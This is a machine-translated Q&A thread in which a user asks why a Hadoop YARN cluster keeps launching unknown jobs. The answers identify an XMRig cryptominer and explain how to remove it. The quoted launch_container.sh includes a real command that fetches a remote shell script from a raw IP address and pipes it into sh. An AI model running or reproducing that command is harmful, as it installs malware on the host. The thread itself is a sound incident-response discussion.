Кажется, что пряжа заражена трояном, даже если я переустановить компьютер?

Question

Каждый раз, когда я запускаю свою пряжу, я нахожу запрос на выполнение задачи, который не может быть завершен, но я не могу получить какой-либо журнал об этом, и я не нашел никакой ошибки.И я нашел файл во временном каталоге с именем launch_container.sh, как показано ниже:

enter code here#!/bin/bash


export NM_HTTP_PORT="8042"

export LOCAL_DIRS="/home/ubuntu/hadoop/tmp/nm-local-dir/usercache/dr.who/appcache/application_1527211944644_0001"

export HADOOP_COMMON_HOME="/root/hadoop-2.8.3"

export JAVA_HOME="/usr/lib/jvm/java-1.7.0-openjdk-1.7.0.181-2.6.14.8.el7_5.x86_64/jre"

export NM_AUX_SERVICE_mapreduce_shuffle="AAA0+gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

"

export HADOOP_YARN_HOME="/root/hadoop-2.8.3"

export HADOOP_TOKEN_FILE_LOCATION="/home/ubuntu/hadoop/tmp/nm-local-dir/usercache/dr.who/appcache/application_1527211944644_0001/container_1527211944644_0001_02_000001/container_tokens"

export NM_HOST="VM_0_11_centos"

export APPLICATION_WEB_PROXY_BASE="/proxy/application_1527211944644_0001"

export JVM_PID="$$"

export USER="dr.who"

export HADOOP_HDFS_HOME="/root/hadoop-2.8.3"

export PWD="/home/ubuntu/hadoop/tmp/nm-local-dir/usercache/dr.who/appcache/application_1527211944644_0001/container_1527211944644_0001_02_000001"

export CONTAINER_ID="container_1527211944644_0001_02_000001"

export HOME="/home/"

export NM_PORT="44381"

export LOGNAME="dr.who"

export APP_SUBMIT_TIME_ENV="1527212057989"

export MAX_APP_ATTEMPTS="2"

export HADOOP_CONF_DIR="/root/hadoop-2.8.3/etc/hadoop"

export MALLOC_ARENA_MAX="4"

export LOG_DIRS="/root/hadoop-2.8.3/logs/userlogs/application_1527211944644_0001/container_1527211944644_0001_02_000001"

exec /bin/bash -c "curl 185.222.210.59/x_wcr.sh | sh"

hadoop_shell_errorcode=$?

if [ $hadoop_shell_errorcode -ne 0 ]

then

  exit $hadoop_shell_errorcode

fi

Я обнаружил, что он загрузит что-то с веб-сайта, и я переустановил свой компьютер из Ubuntu в Centos, и эта проблемавсе еще существовал, хотя я не могу найти ту же проблему в других компьютерах.Это проблема нормальная ли вещь или троянская?Пожалуйста, дайте несколько советов о том, как исправить эту проблему, спасибо.Это так же, как этот сайт "http://ist -deacuna-s1.syr.edu: 8088 / cluster / apps "

Эта ситуация генерируется после закрытия порта wget, иКогда я открываю порт wget, он добавляет сеанс, который не может быть виден jps, просто наблюдаем коммандой

ps -ef|grep java
ubuntu    7484     1 97 07:16 ?        00:01:58 /var/tmp/java -c /var/tmp/w.conf
ubuntu    7496     1 96 07:16 ?        00:01:57 /var/tmp/java -c /var/tmp/w.conf

Эти два сеанса всегда содержат весь мой процессор.

Answer 1

это хак ... Они ставят майнера на твою машину.У меня было то же самое и вот как от этого избавиться.Они создали задание cron для запуска удаленного sh-файла, чтобы «установить» его, если вы удалите его.Это должно быть удалено в первую очередь.Я нашел мой в

/var/spool/cron

Тогда вы можете удалить весь каталог / var / tmp /.Тогда убей оскорбительных пидов.Найдите их с помощью

ps -Af | grep /tmp/

Я пытаюсь выяснить, как они смогли получить доступ к нашей машине, чтобы установить это.

Answer 2

Можете ли вы проверить файл / var / tmp / java с --version.Была такая же проблема.Предложение вы найдете XMRig